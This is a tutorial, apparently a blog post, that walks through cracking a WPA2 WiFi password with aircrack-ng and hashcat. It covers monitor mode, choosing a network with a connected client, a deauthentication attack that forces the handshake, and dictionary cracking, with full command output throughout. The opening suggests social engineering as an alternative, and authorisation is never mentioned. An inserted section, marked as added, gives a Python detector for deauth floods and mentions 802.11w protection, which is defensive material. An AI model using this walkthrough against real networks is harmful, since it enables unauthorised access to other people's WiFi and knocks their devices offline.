You could just connect with one of those "WiFi key" apps instead.
Or simply go the social-engineering route.

Prerequisites

  • The WiFi network has devices connected and the signal strength is acceptable
  • A handshake can be captured
  • You can roughly guess the type of password in use
  • A GPU will crack the password much faster

Work in progress

Install the software

# pacman -S aircrack-ng

List the available wireless cards

# airmon-ng

PHY Interface Driver Chipset

phy0 wlp2s0 iwlwifi Intel Corporation Wi-Fi 6 AX210/AX211/AX411 160MHz (rev 1a)

Put the card into monitor mode

# airmon-ng start wlp2s0

Find a target

Pick one that has a STATION connected, a decent PWR signal level, and an ESSID you like.

# airodump-ng wlp2s0mon
CH 1 ][ Elapsed: 6 s ][ 2023-08-18 23:38

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

5E:DE:34:29:4F:E4 -46 78 51 7 1 1 360 WPA2 CCMP PSK p

BSSID STATION PWR Rate Lost Frames Notes Probes

5E:DE:34:29:4F:E4 54:0E:58:F1:45:09 -28 0 - 6e 228 157
  • BSSID 5E:DE:34:29:4F:E4, ESSID p, with one device connected: that is the lucky one

Capture the handshake

Start capturing the handshake

# airodump-ng -w wifi_p -c 1 --bssid 5E:DE:34:29:4F:E4 wlp2s0mon

CH 1 ][ Elapsed: 1 min ][ 2023-08-18 23:41 ][ WPA handshake: 5E:DE:34:29:4F:E4

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

5E:DE:34:29:4F:E4 -58 68 678 689 65 1 360 WPA2 CCMP PSK p

BSSID STATION PWR Rate Lost Frames Notes Probes

5E:DE:34:29:4F:E4 54:0E:58:F1:45:09 -37 1e- 6e 1099 1660 EAPOL p
  • -w: name of the file to save to
  • -c: channel, the CH field
  • --bssid: MAC address of the target

When "WPA handshake" appears, you have captured the handshake.

Whether or not it succeeds, the results of this run are saved as long as -w was given.

Attack the target to obtain the handshake faster

[root@p-redmibook puzzle]# aireplay-ng -0 3 -a 5E:DE:34:29:4F:E4 wlp2s0mon
23:41:46 Waiting for beacon frame (BSSID: 5E:DE:34:29:4F:E4) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
23:41:46 Sending DeAuth (code 7) to broadcast -- BSSID: [5E:DE:34:29:4F:E4]
23:41:46 Sending DeAuth (code 7) to broadcast -- BSSID: [5E:DE:34:29:4F:E4]
23:41:47 Sending DeAuth (code 7) to broadcast -- BSSID: [5E:DE:34:29:4F:E4]
23:41:47 Sending DeAuth (code 7) to broadcast -- BSSID: [5E:DE:34:29:4F:E4]
  • -0: attack mode, deauthentication
  • 3: total number of rounds; 0 means unlimited
  • -a: MAC address of the target
  • -c: a specific connected client; if omitted, all clients
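The burst above is also what a wireless IDS should flag: a client that roams away sends one or two deauth/disassoc frames, while a deauth tool sends dozens of broadcast frames within a second (the hcxpcapngtool summary further down counts 2561 deauthentication frames in this 90-second capture). The following detector is an added example, not code from the original post or from the aircrack-ng project. It assumes the capture has already been reduced to (timestamp, subtype, BSSID, destination, reason code) records; the records below are constructed by hand to mimic the burst shown above.

```python
"""Deauthentication-flood detector (added example, not from the original post).

Assumes the capture has already been reduced to management-frame records of
(timestamp, subtype, bssid, destination, reason code); the records below are
constructed by hand to mimic the post's aireplay-ng burst: broadcast deauth
frames with reason code 7 sent in quick succession to one BSSID.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

BROADCAST = "ff:ff:ff:ff:ff:ff"
DISCONNECT_SUBTYPES = ("deauth", "disassoc")


@dataclass(frozen=True)
class MgmtFrame:
    ts: float                     # seconds since capture start
    subtype: str                  # "deauth", "disassoc", "beacon", ...
    bssid: str
    dst: str                      # receiver address; BROADCAST hits every client
    reason: Optional[int] = None  # 802.11 reason code, if the frame carries one


@dataclass
class Alert:
    bssid: str
    start_ts: float
    end_ts: float
    count: int
    broadcast_share: float        # fraction of frames addressed to ff:ff:...
    reasons: Dict[int, int] = field(default_factory=dict)


def detect_deauth_floods(frames, max_gap_s=2.0, threshold=10):
    """Group disconnect frames per BSSID into bursts (consecutive frames no more
    than `max_gap_s` apart). Bursts of at least `threshold` frames become
    alerts. A roaming client produces one or two frames and never reaches the
    threshold; a deauth tool produces dozens in a fraction of a second."""
    bursts: Dict[str, List[MgmtFrame]] = {}
    alerts: List[Alert] = []

    def flush(bssid):
        burst = bursts.pop(bssid, [])
        if len(burst) < threshold:
            return
        reasons: Dict[int, int] = {}
        for f in burst:
            if f.reason is not None:
                reasons[f.reason] = reasons.get(f.reason, 0) + 1
        n_bcast = sum(1 for f in burst if f.dst == BROADCAST)
        alerts.append(Alert(bssid, burst[0].ts, burst[-1].ts, len(burst),
                            n_bcast / len(burst), reasons))

    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in DISCONNECT_SUBTYPES:
            continue
        burst = bursts.get(f.bssid)
        if burst and f.ts - burst[-1].ts > max_gap_s:
            flush(f.bssid)        # a quiet period ended the previous burst
            burst = None
        if burst is None:
            burst = bursts[f.bssid] = []
        burst.append(f)
    for bssid in list(bursts):
        flush(bssid)
    return alerts


AP = "5e:de:34:29:4f:e4"          # the BSSID from the post's capture
CLIENT = "54:0e:58:f1:45:09"      # the STATION from the post's capture

# Constructed sample: two ordinary disconnects from a roaming client and, in
# between, a 64-frame broadcast deauth burst with reason code 7.
SAMPLE_FRAMES = (
    [MgmtFrame(0.0, "beacon", AP, BROADCAST),
     MgmtFrame(0.5, "deauth", AP, CLIENT, 3)]          # client leaving (benign)
    + [MgmtFrame(10.0 + i * 0.01, "deauth", AP, BROADCAST, 7) for i in range(64)]
    + [MgmtFrame(30.0, "disassoc", AP, CLIENT, 8)]     # benign again
)

if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"{a.bssid}: {a.count} disconnect frames in "
              f"{a.end_ts - a.start_ts:.2f}s, {a.broadcast_share:.0%} broadcast, "
              f"reason codes {a.reasons}")
```

The burst grouping, rather than a fixed time window, means one attack run yields one alert with the full frame count. The broadcast share and reason-code histogram are the fields worth keeping in the alert: a flood of broadcast frames all carrying reason 7 has no legitimate source, whereas a mix of unicast frames with reasons 3 and 8 is ordinary client churn. The long-term mitigation is Protected Management Frames (802.11w), which makes spoofed deauth frames fail MIC validation at the client.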

Crack the handshake

Generate a dictionary

echo 'qaz123456' > wifi_password.dict

Crack the handshake with the dictionary

The built-in CPU method

# aircrack-ng -w wifi_password.dict wifi_p-01.cap
Reading packets, please wait...
Opening wifi_p-01.cap
Read 6644 packets.

# BSSID ESSID Encryption

1 5E:DE:34:29:4F:E4 p WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening wifi_p-01.cap
Read 6644 packets.

1 potential targets



Aircrack-ng 1.7

[00:00:00] 1/1 keys tested (39.93 k/s)

Time left: --

KEY FOUND! [ qaz123456 ]


Master Key : 1D 02 19 7B 71 FF F2 E0 3D 45 06 81 6D 0B 61 D3
B6 37 49 89 4C 5F 98 09 A8 30 11 96 E9 A1 8E B4

Transient Key : 99 DF F0 C4 41 F8 3A FF D9 E1 DB CB 0B F2 BB 93
2D 37 44 6F 4B 53 86 5C F0 15 CE 64 E0 C8 00 08
AD A9 5D 7E 7E 4C 5C E6 82 D4 9D CF 72 AD 8D 20
B5 0C F9 F8 5E D8 BB 01 FC 1A C3 BB E4 31 A2 9A

EAPOL HMAC : DB FD 4A 90 FC 1D 4A 90 EF B3 02 12 EF 51 85 9C
  • -w: the dictionary file

Using hashcat in GPU mode

Convert the cap file into a format hashcat understands

$ hcxpcapngtool wifi_p-01.cap -o wifi_p-01.hash
hcxpcapngtool 6.3.0 reading from wifi_p-01.cap...

summary capture file
--------------------
file name................................: wifi_p-01.cap
version (pcap/cap).......................: 2.4 (very basic format without any additional information)
timestamp minimum (GMT)..................: 18.08.2023 23:40:25
timestamp maximum (GMT)..................: 18.08.2023 23:41:57
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11 (105) very basic format without any additional information about the quality
endianness (capture system)..............: little endian
packets inside...........................: 6644
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 1
ACTION (total)...........................: 53
PROBEREQUEST (directed)..................: 4
PROBERESPONSE (total)....................: 79
DEAUTHENTICATION (total).................: 2561
AUTHENTICATION (total)...................: 6
AUTHENTICATION (OPEN SYSTEM).............: 6
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
WPA encrypted............................: 689
EAPOL messages (total)...................: 8
EAPOL RSN messages.......................: 8
EAPOLTIME gap (measured maximum msec)....: 2695
EAPOL ANONCE error corrections (NC)......: not detected
EAPOL M1 messages (total)................: 2
EAPOL M2 messages (total)................: 2
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 2
EAPOL M4 messages (zeroed NONCE).........: 2
EAPOL pairs (total)......................: 7
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1

session summary
---------------
processed cap files...................: 1
Enjoy the smell of the GPU

$ hashcat -m 22000 wifi_p-01.hash wifi_password.dict
hashcat (v6.2.6) starting

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 12.2)
====================
* Device #1: NVIDIA GeForce RTX 2050, 3827/3904 MB, 16MCU

OpenCL API (OpenCL 3.0 CUDA 12.2.135) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: NVIDIA GeForce RTX 2050, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 2 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1075 MB

Dictionary cache built:
* Filename..: wifi_password.txt
* Passwords.: 1
* Bytes.....: 10
* Keyspace..: 1
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

dbfd4a90fc1d4a90efb30212ef51859c:ea6dcb4ac62e:bc6ad15e5197:p:qaz123456

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: wifi_p-01.hash
Time.Started.....: Sat Aug 19 00:02:57 2023 (0 secs)
Time.Estimated...: Sat Aug 19 00:02:57 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (wifi_password.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 56 H/s (0.09ms) @ Accel:64 Loops:32 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: qaz123456 -> qaz123456
Hardware.Mon.#1..: Temp: 42c Util: 94% Core:1702MHz Mem:7000MHz Bus:4

Started: Sat Aug 19 00:02:54 2023
Stopped: Sat Aug 19 00:02:58 2023

Stop monitor mode

airmon-ng stop wlp2s0mon

Other

Obtaining a hidden SSID

Similar to the way the handshake is captured.

Keep up the attack; when a device connects, the name will show up.

Capturing 5 GHz WiFi packets

todo

References